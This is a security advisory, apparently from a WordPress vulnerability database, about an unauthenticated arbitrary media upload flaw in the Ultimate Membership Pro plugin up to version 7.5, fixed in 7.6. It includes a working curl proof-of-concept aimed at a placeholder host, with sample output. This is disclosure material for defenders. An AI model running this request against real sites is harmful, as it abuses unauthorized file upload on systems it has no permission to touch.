Ultimate Membership Pro <= 7.5 – Arbitrary media upload

Description

The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do:

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.

Proof of Concept

curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugins

indeed-membership-pro

Fixed in 7.6

References

URL

https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253

URL

https://codecanyon.net/comments/21539595

Miscellaneous

Original Researcher

James Fraser

Submitter

fwaggle

Submitter twitter

fwaggle

Verified

WPVDB ID

2932dce5-375d-4a1d-8285-0bda5cb27a0a

Timeline

Publicly Published

2019-02-26 (about 7 years ago)

Added

2019-05-27 (about 6 years ago)

Last Updated

2020-02-07 (about 6 years ago)

Other

Published

Title

Published

2013-11-30

Title

Phototouch < 1.2.2 - Arbitrary File Upload via themify-ajax.php

Published

2023-12-27

Title

WP MLM <= 4.0 - Unauthenticated Arbitrary File Upload

Published

2024-01-09

Title

AI Engine: ChatGPT Chatbot < 1.9.99 - Unauthenticated Arbitrary File Upload

Published

2025-09-24

Title

Advanced Settings < 3.2.0 - Authenticated (Author+) Arbitrary File Upload

Published

2024-04-01

Title

EnvíaloSimple: Email Marketing y Newsletters < 2.4 - Arbitrary File Upload via CSRF